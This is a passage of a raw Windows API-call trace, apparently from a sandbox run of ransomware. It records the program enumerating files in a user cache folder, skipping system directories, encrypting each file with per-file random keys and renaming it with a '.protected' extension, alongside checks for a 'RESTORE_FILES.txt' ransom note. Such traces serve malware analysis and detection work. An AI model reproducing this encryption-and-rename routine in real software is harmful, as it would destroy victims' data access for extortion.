(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0089.065] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".zip") returned 0x0 [0089.065] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.066] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.066] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.066] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.066] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.066] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.067] CloseHandle (hObject=0x150) returned 1 [0089.067] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected") returned 162 [0089.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.protected")) returned 1 [0089.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Windows") returned -1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files") returned -1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files (x86)") returned -1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="$Recycle.bin") returned 1 [0089.067] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="System Volume Information") returned -1 [0089.067] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.067] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".protected") returned 0x0 [0089.067] lstrcmpW 
(lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="RESTORE_FILES.txt") returned -1 [0089.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.068] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".txt") returned 0x0 [0089.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.068] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".rar") returned 0x0 [0089.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0089.068] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".zip") returned 0x0 [0089.068] ReadFile 
(in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.069] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.069] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x188, lpOverlapped=0x0) returned 1 [0089.069] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.069] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.069] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.069] CloseHandle (hObject=0x150) returned 1 [0089.069] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected") returned 162 [0089.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.protected")) returned 1 [0089.070] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Windows") returned -1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files") returned -1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files (x86)") returned -1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="$Recycle.bin") returned 1 [0089.070] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="System Volume Information") returned -1 [0089.070] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.070] StrStrIW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".protected") returned 0x0 [0089.070] lstrcmpW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="RESTORE_FILES.txt") returned -1 [0089.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0089.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.071] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".txt") returned 0x0 [0089.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.071] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".rar") returned 0x0 [0089.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0089.071] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".zip") returned 0x0 [0089.071] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x196, lpOverlapped=0x0) returned 1 [0089.072] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.072] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x196, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x196, lpOverlapped=0x0) returned 1 [0089.072] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.072] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.072] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.072] CloseHandle (hObject=0x150) returned 1 [0089.072] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected") returned 162 [0089.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.protected")) returned 1 [0089.073] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0089.073] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0089.073] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.073] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0089.073] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0089.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 
[0089.074] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0089.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.074] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0089.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0089.074] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0089.074] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x156, lpOverlapped=0x0) returned 1 [0089.074] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffeaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.075] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x156, lpOverlapped=0x0) returned 1 [0089.075] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.075] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.075] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.075] CloseHandle (hObject=0x150) returned 1 [0089.075] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected") returned 129 [0089.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0089.076] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Windows") returned -1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files") returned -1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files (x86)") returned -1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="$Recycle.bin") returned 1 [0089.076] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="System Volume Information") returned -1 [0089.076] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrIW 
(lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".protected") returned 0x0 [0089.076] lstrcmpW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="RESTORE_FILES.txt") returned -1 [0089.076] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.076] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".txt") returned 0x0 [0089.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".rar") returned 0x0 [0089.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0089.076] 
StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".zip") returned 0x0 [0089.076] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.077] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.077] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.077] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.077] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.077] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.078] CloseHandle (hObject=0x150) returned 1 [0089.078] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.protected") returned 162 [0089.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js 
